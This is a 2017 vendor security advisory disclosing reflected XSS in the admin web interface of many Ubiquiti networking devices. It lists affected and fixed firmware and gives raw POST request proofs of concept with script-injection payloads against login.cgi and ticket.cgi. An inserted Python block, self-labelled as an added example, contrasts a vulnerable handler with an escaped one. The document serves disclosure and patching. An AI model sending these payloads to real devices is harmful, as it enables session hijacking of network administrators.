Multiple reflected cross site scripting (XSS) in Ubiquiti Networks products

SEC Consult Vulnerability Lab Security Advisory < 20170620-0 >
=======================================================================
              title: Multiple Reflected Cross Site Scripting (XSS)
            product: Multiple Ubiquiti Networks products, e.g.
                     TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16,
                     AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M,
                     AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti,
                     BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5,
                     locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22,
                     NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365,
                     NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP,
                     Power AP N, AF24, AF24HD
 vulnerable version: v1.3.3 (SW), v6.0 (XM), v3.2 (AF24)
      fixed version: v1.3.4 (SW), v6.0.1 (XM), v3.2.2 (AF24)
         CVE number: -
             impact: Medium
           homepage: www.ubnt.com
              found: 2017-02-02
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     www.sec-consult.com
=======================================================================

 

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking technology for
service providers and enterprises. Our technology platforms focus on
delivering highly advanced and easily deployable solutions that appeal to
a global customer base in underserved and underpenetrated markets."

Source: ir.ubnt.com

 

 

Business recommendation:
------------------------
SEC Consult recommends installing the patched firmware.

 

 

Vulnerability overview/description:
-----------------------------------
1) Reflected Cross Site Scripting (XSS) via POST request - HackerOne #203781
A reflected cross site scripting vulnerability was identified in 'ticket.cgi',
'login.cgi' and many other CGI scripts of the admin interface. The parameter
'ui_language' is reflected into the response without any sanitization of the
input. Other parameters are prone to XSS for the same reason. An attacker can
exploit these vulnerabilities to steal the cookies of the attacked user in
order to log in to the device remotely, and can also perform actions in the
context of the attacked user.
This vulnerability had been found earlier by another bug bounty participant
on HackerOne and was filed there as report #158287.

 

 

Proof of concept:
-----------------
1) Reflected Cross Site Scripting (XSS) via POST request
To produce a reflected XSS, the following requests can be used for firmware
v6.0 (XM):

Request 1:
-------------------------------------------------------------------------------
POST /ticket.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

ui_language="></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
Request 2:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

ui_language="></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------

The 'PHP_SELF' parameter is injectable in the same way. The 'error_msg'
parameter can be exploited once 'ui_language' is set to an arbitrary value:
Request 3:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

ui_language=1
error_msg=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------

 

Since the parameter names differ in firmware v1.3.3 (SW), other names must be
used for an XSS PoC on that version.
Request 1:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

uri=1
error_msg=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
Request 2:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

uri=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------
Request 3:
-------------------------------------------------------------------------------
POST /login.cgi HTTP/1.1
Host: $IP
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

PHP_SELF=1"></script><script>alert(document.cookie)</script>
-------------------------------------------------------------------------------

 

The requests above used 'login.cgi' and 'ticket.cgi', but many more scripts in
the administrative panel are prone to this type of vulnerability. The PoC for
the AirFiber series looks like request 3 from above.
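To make the root cause and the fix concrete, the following Python is an added example (not code from the advisory or from Ubiquiti): it models a CGI handler that echoes 'ui_language' and 'error_msg' unsanitized, as described in the overview and exercised by the PoC requests above, beside a hardened version that allowlists the language code and encodes each value for the context it lands in. The page layout, the '/js/lang/' path, SUPPORTED_LANGS and the function names are assumptions; only the parameter names and the payload come from the advisory.

```python
import html
import json

# Payload quoted in the advisory's PoC requests (constructed test input).
PAYLOAD = '"></script><script>alert(document.cookie)</script>'
SUPPORTED_LANGS = {"en", "de", "fr"}  # assumed allowlist of language codes


def render_vulnerable(ui_language: str, error_msg: str) -> str:
    """Echoes both parameters verbatim (assumed page layout). The payload's
    leading '">' closes the src attribute and the tag, and its
    '</script><script>' then starts a script element of the attacker's own."""
    return (
        f'<script src="/js/lang/{ui_language}.js"></script>\n'
        f'<script>var error_msg="{error_msg}";</script>'
    )


def js_string(value: str) -> str:
    """JS string literal safe to embed inside <script>: json.dumps quotes and
    escapes '"' and backslashes; '<', '>' and '&' are escaped as well so the
    HTML parser can never see a '</script>' inside the literal."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_hardened(ui_language: str, error_msg: str) -> str:
    """Allowlist the value that builds a path, HTML-escape what lands in an
    attribute, JS-escape what lands in a script string literal."""
    if ui_language not in SUPPORTED_LANGS:
        ui_language = "en"
    return (
        f'<script src="/js/lang/{html.escape(ui_language)}.js"></script>\n'
        f'<script>var error_msg={js_string(error_msg)};</script>'
    )


def injected(page: str) -> bool:
    """Both templates emit exactly two script elements; any further
    '</script>' means reflected input became live markup."""
    return page.lower().count("</script>") > 2
```

The same treatment applies to 'uri' and 'PHP_SELF' on firmware v1.3.3 (SW), which the advisory shows are reflected in the same way.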

 

 

Vulnerable / tested versions:
-----------------------------
(Rocket) M5 - v6.0 (XM)
TS-8-PRO - v1.3.3 (SW)
(AirFiber) AF24 - v3.2 (AF24)

Based on information embedded in the firmware of other Ubiquiti products,
gathered with our IoT Inspector tool, we believe the following devices are
affected as well:
Ubiquiti Networks AF-2X (Version: AF2X v3.2)
Ubiquiti Networks AF-3X (Version: AF3X v3.2)
Ubiquiti Networks AF5 (Version: AF5 v3.2)
Ubiquiti Networks AF5U (Version: AF5 v3.2)
Ubiquiti Networks AF-5X (Version: AF5X v3.2.1)
Ubiquiti Networks LBE-5AC-16-120 (Version: WA v7.2.4)
Ubiquiti Networks LBE-5AC-23 (Version: WA v7.2.4)
Ubiquiti Networks LBE-M5-23 (Version: XW v6.0)
Ubiquiti Networks NBE-5AC-16 (Version: WA v7.2.4)
Ubiquiti Networks NBE-5AC-19 (Version: XC v7.2.4)
Ubiquiti Networks NBE-M2-13 (Version: XW v6.0)
Ubiquiti Networks NBE-M5-16 (Version: XW v6.0)
Ubiquiti Networks NBE-M5-19 (Version: XW v6.0)
Ubiquiti Networks PBE-5AC-300 (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-300-ISO (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-400 (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-400-ISO (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-500 (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-500-ISO (Version: XC v7.2.4)
Ubiquiti Networks PBE-5AC-620 (Version: XC v7.2.4)
Ubiquiti Networks PBE-M2-400 (Version: XW v6.0)
Ubiquiti Networks PBE-M5-300 (Version: XW v6.0)
Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0)
Ubiquiti Networks PBE-M5-400 (Version: XW v6.0)
Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0)
Ubiquiti Networks PBE-M5-620 (Version: XW v6.0)
Ubiquiti Networks R5AC-Lite (Version: XC v7.2.4)
Ubiquiti Networks R5AC-PRISM (Version: XC v7.2.4)
Ubiquiti Networks R5AC-PTMP (Version: XC v7.2.4)
Ubiquiti Networks R5AC-PTP (Version: XC v7.2.4)
Ubiquiti Networks RM2-Ti (Version: XW v6.0)
Ubiquiti Networks RM5-Ti (Version: XW v6.0)

 

 

Vendor contact timeline:
------------------------
2017-02-06: Contacting vendor via HackerOne
2017-02-15: Vendor marked POST XSS as duplicate of #158287
2017-02-21: Asking when a patch will be available. No answer.
2017-03-17: Asking for a status update. Vendor responds that the
            vulnerability is resolved in the newest firmware:
            v1.3.4 (SW) / v6.0.1 (XM) / v3.2.2 (AF24).
2017-03-20: Informing the vendor that the release date has been set to
            2017-03-22.
2017-03-20: Vendor asks for more time because the vulnerability is not
            fixed in all devices. Release shifted to 2017-06-19.
2017-03-21: Asking for an estimated time frame. Vendor needs 1-3 weeks to
            provide a fix. Service releases for AirOS v8.0.2 (AC) and
            AirOS v6.0.2 (M) are planned.
2017-03-22: Fixes confirmed
2017-05-15: Contacted vendor via e-mail and set the publication date to
            2017-06-20.
2017-06-20: Public release of security advisory

 

 

Solution:
---------
Upgrade to firmware version v1.3.4 (SW), v6.0.1 (XM), v3.2.2 (AF24) or
later.

 

 

Workaround:
-----------
No workaround

 

 

Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested in working with the experts of SEC Consult?
Send us your application www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult

EOF T. Weber / @2017